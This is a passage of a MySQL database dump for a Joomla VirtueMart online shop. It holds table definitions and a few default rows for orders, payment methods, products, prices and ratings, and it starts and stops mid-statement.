allows shoppers to update their account information and view previously placed orders.','shopper,storeadmin,admin,demo',1,'',99),(10,'checkout','','none',0,'',99),(11,'tools','Tools','admin',1,'0',8),(13,'zone','This is the zone-shipment module. Here you can manage your shipment costs according to Zones.','admin,storeadmin',0,'',11);
/*!40000 ALTER TABLE `myaou_virtuemart_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_order_calc_rules`
--

DROP TABLE IF EXISTS `myaou_virtuemart_order_calc_rules`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_order_calc_rules` (
  `virtuemart_order_calc_rule_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_calc_id` int DEFAULT NULL,
  `virtuemart_order_id` int DEFAULT NULL,
  `virtuemart_vendor_id` smallint NOT NULL DEFAULT '1',
  `virtuemart_order_item_id` int DEFAULT NULL,
  `calc_rule_name` char(64) NOT NULL DEFAULT '' COMMENT 'Name of the rule',
  `calc_kind` char(16) NOT NULL DEFAULT '' COMMENT 'Discount/Tax/Margin/Commission',
  `calc_mathop` char(16) NOT NULL DEFAULT '' COMMENT 'Discount/Tax/Margin/Commission',
  `calc_amount` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `calc_result` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `calc_value` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `calc_currency` smallint DEFAULT NULL,
  `calc_params` varchar(18000) DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_order_calc_rule_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Stores all calculation rules which are part of an order';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_order_calc_rules`
--

LOCK TABLES `myaou_virtuemart_order_calc_rules` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_order_calc_rules` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_order_calc_rules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_orderstates`
--

DROP TABLE IF EXISTS `myaou_virtuemart_orderstates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_orderstates` (
  `virtuemart_orderstate_id` tinyint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint NOT NULL DEFAULT '1',
  `order_status_code` char(1) NOT NULL DEFAULT '',
  `order_status_name` char(64) DEFAULT NULL,
  `order_status_description` varchar(20000) DEFAULT NULL,
  `order_stock_handle` char(1) NOT NULL DEFAULT 'A',
  `ordering` int NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_orderstate_id`),
  KEY `idx_order_status_ordering` (`ordering`),
  KEY `idx_order_status_virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `i_published` (`published`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb3 COMMENT='All available order statuses';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_orderstates`
--

LOCK TABLES `myaou_virtuemart_orderstates` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_orderstates` DISABLE KEYS */;
INSERT INTO `myaou_virtuemart_orderstates` VALUES (1,1,'P','COM_VIRTUEMART_ORDER_STATUS_PENDING','','R',1,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(2,1,'U','COM_VIRTUEMART_ORDER_STATUS_CONFIRMED_BY_SHOPPER','','R',2,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(3,1,'C','COM_VIRTUEMART_ORDER_STATUS_CONFIRMED','','R',3,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,1,'X','COM_VIRTUEMART_ORDER_STATUS_CANCELLED','','A',4,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(5,1,'R','COM_VIRTUEMART_ORDER_STATUS_REFUNDED','','A',5,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(6,1,'S','COM_VIRTUEMART_ORDER_STATUS_SHIPPED','','O',6,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `myaou_virtuemart_orderstates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_paymentmethod_shoppergroups`
--

DROP TABLE IF EXISTS `myaou_virtuemart_paymentmethod_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_paymentmethod_shoppergroups` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_paymentmethod_id` mediumint unsigned NOT NULL DEFAULT '0',
  `virtuemart_shoppergroup_id` smallint unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_paymentmethod_id` (`virtuemart_paymentmethod_id`,`virtuemart_shoppergroup_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='xref table for paymentmethods to shoppergroup';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_paymentmethod_shoppergroups`
--

LOCK TABLES `myaou_virtuemart_paymentmethod_shoppergroups` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_paymentmethod_shoppergroups` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_paymentmethod_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_paymentmethods`
--

DROP TABLE IF EXISTS `myaou_virtuemart_paymentmethods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_paymentmethods` (
  `virtuemart_paymentmethod_id` mediumint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint NOT NULL DEFAULT '1',
  `payment_jplugin_id` int NOT NULL DEFAULT '0',
  `payment_element` char(50) NOT NULL DEFAULT '',
  `payment_params` varchar(19000) DEFAULT NULL,
  `shared` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'valide for all vendors?',
  `ordering` int NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_paymentmethod_id`),
  KEY `idx_payment_jplugin_id` (`payment_jplugin_id`),
  KEY `idx_payment_element` (`payment_element`,`virtuemart_vendor_id`),
  KEY `idx_payment_method_ordering` (`ordering`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='The payment methods of your store';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_paymentmethods`
--

LOCK TABLES `myaou_virtuemart_paymentmethods` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_paymentmethods` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_paymentmethods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_paymentmethods_en_gb`
--

DROP TABLE IF EXISTS `myaou_virtuemart_paymentmethods_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_paymentmethods_en_gb` (
  `virtuemart_paymentmethod_id` int unsigned NOT NULL,
  `payment_name` char(180) NOT NULL DEFAULT '',
  `payment_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_paymentmethods_en_gb`
--

LOCK TABLES `myaou_virtuemart_paymentmethods_en_gb` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_paymentmethods_en_gb` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_paymentmethods_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_paymentmethods_tr_tr`
--

DROP TABLE IF EXISTS `myaou_virtuemart_paymentmethods_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_paymentmethods_tr_tr` (
  `virtuemart_paymentmethod_id` int unsigned NOT NULL,
  `payment_name` char(180) NOT NULL DEFAULT '',
  `payment_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_paymentmethods_tr_tr`
--

LOCK TABLES `myaou_virtuemart_paymentmethods_tr_tr` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_paymentmethods_tr_tr` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_paymentmethods_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_product_categories`
--

DROP TABLE IF EXISTS `myaou_virtuemart_product_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_product_categories` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_category_id` mediumint unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_product_id` (`virtuemart_product_id`,`virtuemart_category_id`),
  KEY `i_ordering` (`ordering`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Maps Products to Categories';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_product_categories`
--

LOCK TABLES `myaou_virtuemart_product_categories` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_product_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_product_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_product_customfields`
--

DROP TABLE IF EXISTS `myaou_virtuemart_product_customfields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_product_customfields` (
  `virtuemart_customfield_id` int unsigned NOT NULL AUTO_INCREMENT COMMENT 'field id',
  `virtuemart_product_id` int NOT NULL DEFAULT '0',
  `virtuemart_custom_id` int NOT NULL DEFAULT '1' COMMENT 'custom group id',
  `customfield_value` text COMMENT 'field value',
  `customfield_price` decimal(15,6) DEFAULT NULL COMMENT 'price',
  `disabler` int unsigned NOT NULL DEFAULT '0',
  `override` int unsigned NOT NULL DEFAULT '0',
  `customfield_params` text COMMENT 'Param for Plugins',
  `product_sku` char(64) DEFAULT NULL,
  `product_gtin` char(64) DEFAULT NULL,
  `product_mpn` char(64) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int unsigned NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int unsigned NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_customfield_id`),
  KEY `idx_virtuemart_product_id` (`virtuemart_product_id`),
  KEY `idx_virtuemart_custom_id` (`virtuemart_custom_id`),
  KEY `idx_published` (`published`),
  KEY `idx_ordering` (`ordering`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='custom fields';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_product_customfields`
--

LOCK TABLES `myaou_virtuemart_product_customfields` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_product_customfields` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_product_customfields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_product_manufacturers`
--

DROP TABLE IF EXISTS `myaou_virtuemart_product_manufacturers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_product_manufacturers` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int DEFAULT NULL,
  `virtuemart_manufacturer_id` smallint unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_product_id` (`virtuemart_product_id`,`virtuemart_manufacturer_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Maps a product to a manufacturer';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_product_manufacturers`
--

LOCK TABLES `myaou_virtuemart_product_manufacturers` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_product_manufacturers` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_product_manufacturers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_product_medias`
--

DROP TABLE IF EXISTS `myaou_virtuemart_product_medias`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_product_medias` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_media_id` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_product_id` (`virtuemart_product_id`,`virtuemart_media_id`),
  KEY `i_ordering` (`ordering`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_product_medias`
--

LOCK TABLES `myaou_virtuemart_product_medias` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_product_medias` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_product_medias` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_product_prices`
--

DROP TABLE IF EXISTS `myaou_virtuemart_product_prices`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_product_prices` (
  `virtuemart_product_price_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_shoppergroup_id` int DEFAULT NULL,
  `product_price` decimal(15,6) DEFAULT NULL,
  `override` tinyint(1) DEFAULT NULL,
  `product_override_price` decimal(15,5) DEFAULT NULL,
  `product_tax_id` int DEFAULT NULL,
  `product_discount_id` int DEFAULT NULL,
  `product_currency` smallint DEFAULT NULL,
  `product_price_publish_up` datetime DEFAULT NULL,
  `product_price_publish_down` datetime DEFAULT NULL,
  `price_quantity_start` int unsigned DEFAULT NULL,
  `price_quantity_end` int unsigned DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_product_price_id`),
  KEY `i_product_id` (`virtuemart_product_id`),
  KEY `i_virtuemart_shoppergroup_id` (`virtuemart_shoppergroup_id`),
  KEY `dx_product_price_publish_up` (`product_price_publish_up`),
  KEY `dx_product_price_publish_down` (`product_price_publish_down`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Holds price records for a product';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_product_prices`
--

LOCK TABLES `myaou_virtuemart_product_prices` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_product_prices` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_product_prices` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_product_shoppergroups`
--

DROP TABLE IF EXISTS `myaou_virtuemart_product_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_product_shoppergroups` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_shoppergroup_id` smallint unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `i_virtuemart_product_id` (`virtuemart_product_id`,`virtuemart_shoppergroup_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Maps Products to Categories';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_product_shoppergroups`
--

LOCK TABLES `myaou_virtuemart_product_shoppergroups` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_product_shoppergroups` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_product_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_products`
--

DROP TABLE IF EXISTS `myaou_virtuemart_products`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_products` (
  `virtuemart_product_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint unsigned NOT NULL DEFAULT '1',
  `product_parent_id` int unsigned NOT NULL DEFAULT '0',
  `product_sku` char(64) DEFAULT NULL,
  `product_gtin` char(64) DEFAULT NULL,
  `product_mpn` char(64) DEFAULT NULL,
  `product_weight` decimal(10,4) DEFAULT NULL,
  `product_weight_uom` char(7) DEFAULT NULL,
  `product_length` decimal(10,4) DEFAULT NULL,
  `product_width` decimal(10,4) DEFAULT NULL,
  `product_height` decimal(10,4) DEFAULT NULL,
  `product_lwh_uom` char(7) DEFAULT NULL,
  `product_url` char(255) DEFAULT NULL,
  `product_in_stock` int NOT NULL DEFAULT '0',
  `product_ordered` int NOT NULL DEFAULT '0',
  `low_stock_notification` int unsigned NOT NULL DEFAULT '0',
  `product_available_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `product_availability` char(32) DEFAULT NULL,
  `product_special` tinyint(1) DEFAULT NULL,
  `product_sales` int unsigned NOT NULL DEFAULT '0',
  `product_unit` varchar(8) DEFAULT NULL,
  `product_packaging` decimal(8,4) unsigned DEFAULT NULL,
  `product_params` varchar(2000) DEFAULT NULL,
  `hits` int unsigned DEFAULT NULL,
  `intnotes` varchar(18000) DEFAULT NULL,
  `metarobot` varchar(400) DEFAULT NULL,
  `metaauthor` varchar(400) DEFAULT NULL,
  `layout` char(16) DEFAULT NULL,
  `published` tinyint(1) DEFAULT NULL,
  `pordering` mediumint unsigned NOT NULL DEFAULT '0',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_product_id`),
  KEY `idx_product_virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `idx_product_product_parent_id` (`product_parent_id`),
  KEY `i_product_special` (`product_special`),
  KEY `i_published` (`published`),
  KEY `i_pordering` (`pordering`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='All products are stored here.';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_products`
--

LOCK TABLES `myaou_virtuemart_products` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_products` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_products` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_products_en_gb`
--

DROP TABLE IF EXISTS `myaou_virtuemart_products_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_products_en_gb` (
  `virtuemart_product_id` int unsigned NOT NULL,
  `product_s_desc` varchar(2000) NOT NULL DEFAULT '',
  `product_desc` varchar(18400) NOT NULL DEFAULT '',
  `product_name` char(180) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` char(255) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_products_en_gb`
--

LOCK TABLES `myaou_virtuemart_products_en_gb` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_products_en_gb` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_products_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_products_tr_tr`
--

DROP TABLE IF EXISTS `myaou_virtuemart_products_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_products_tr_tr` (
  `virtuemart_product_id` int unsigned NOT NULL,
  `product_s_desc` varchar(2000) NOT NULL DEFAULT '',
  `product_desc` varchar(18400) NOT NULL DEFAULT '',
  `product_name` char(180) NOT NULL DEFAULT '',
  `metadesc` varchar(400) NOT NULL DEFAULT '',
  `metakey` varchar(400) NOT NULL DEFAULT '',
  `customtitle` char(255) NOT NULL DEFAULT '',
  `slug` char(192) NOT NULL DEFAULT '',
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_products_tr_tr`
--

LOCK TABLES `myaou_virtuemart_products_tr_tr` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_products_tr_tr` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_products_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_rating_reviews`
--

DROP TABLE IF EXISTS `myaou_virtuemart_rating_reviews`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_rating_reviews` (
  `virtuemart_rating_review_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `comment` varchar(18000) DEFAULT NULL,
  `review_ok` tinyint(1) NOT NULL DEFAULT '0',
  `review_rates` int unsigned NOT NULL DEFAULT '0',
  `review_ratingcount` int unsigned NOT NULL DEFAULT '0',
  `review_rating` decimal(10,2) NOT NULL DEFAULT '0.00',
  `review_editable` tinyint(1) NOT NULL DEFAULT '1',
  `lastip` char(50) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_rating_review_id`),
  UNIQUE KEY `i_virtuemart_product_id` (`virtuemart_product_id`,`created_by`),
  KEY `i_published` (`published`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_rating_reviews`
--

LOCK TABLES `myaou_virtuemart_rating_reviews` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_rating_reviews` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_rating_reviews` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_rating_votes`
--

DROP TABLE IF EXISTS `myaou_virtuemart_rating_votes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_rating_votes` (
  `virtuemart_rating_vote_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `vote` int NOT NULL DEFAULT '0',
  `lastip` char(50) NOT NULL DEFAULT '0',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_rating_vote_id`),
  UNIQUE KEY `i_virtuemart_product_id` (`virtuemart_product_id`,`created_by`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Stores all ratings for a product';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_rating_votes`
--

LOCK TABLES `myaou_virtuemart_rating_votes` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_rating_votes` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_rating_votes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_ratings`
--

DROP TABLE IF EXISTS `myaou_virtuemart_ratings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_ratings` (
  `virtuemart_rating_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `rates` int NOT NULL DEFAULT '0',
  `ratingcount` int unsigned NOT NULL DEFAULT '0',
  `rating` decimal(10,1) NOT NULL DEFAULT '0.0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_rating_id`),
  UNIQUE KEY `i_virtuemart_product_id` (`virtuemart_product_id`,`virtuemart_rating_id`),
  KEY `i_published` (`published`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Stores all ratings for a product';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `myaou_virtuemart_ratings`
--

LOCK TABLES `myaou_virtuemart_ratings` WRITE;
/*!40000 ALTER TABLE `myaou_virtuemart_ratings` DISABLE KEYS */;
/*!40000 ALTER TABLE `myaou_virtuemart_ratings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `myaou_virtuemart_shipmentmethod_shoppergroups`
--

DROP TABLE IF EXISTS `myaou_virtuemart_shipmentmethod_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `myaou_virtuemart_shipmentmethod_shoppergroups` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_shipmentmethod_id` mediumint unsigned DEFAULT NULL,
